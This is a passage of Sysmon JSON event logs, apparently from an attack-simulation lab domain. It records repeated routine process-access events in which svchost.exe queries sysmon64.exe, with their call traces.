\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6186,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:56.595\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:56.595","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6187,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:56.595\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:56.595","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6188,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:56.595\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:56.595","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6189,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:56.595\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:56.595","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6190,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:56.595\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:56.595","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6191,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:56.595\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:56.595","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6192,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:56.595\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:56.595","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6193,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:56.595\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:56.595","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
